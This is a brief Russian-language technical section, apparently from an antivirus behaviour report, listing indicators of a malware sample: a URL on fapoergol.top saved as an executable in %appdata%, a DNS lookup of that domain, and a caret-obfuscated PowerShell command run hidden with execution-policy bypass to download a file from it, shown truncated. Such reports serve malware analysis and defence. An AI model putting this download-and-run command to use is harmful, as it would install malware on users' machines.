Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWe^R^sH^eLL.Exe -EXE^C^u^TioN^PoL^iCy b^Y^p^aS^S^ -NoprOFil^e -^wIN^dOwS^t^yle hiDD^EN ^(nEw-O^B^JECt SYstE^M.^N^ET.wEb^C^LI^e^Nt).^d^O^wNl^oA^DfIL^E('http://www.fapoergol....
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "pOWe^R^sH^eLL.Exe -EXE^C^u^TioN^PoL^iCy b^Y^p^aS^S^ -NoprOFil^e -^wIN^dOwS^t^yle hiDD^EN ^(nEw-O^B^JECt SYstE^M.^N^ET.wEb^C^LI^e^Nt).^d^O^wNl^oA^DfIL^E('http://www.fapoergol....' (со скрытым окном)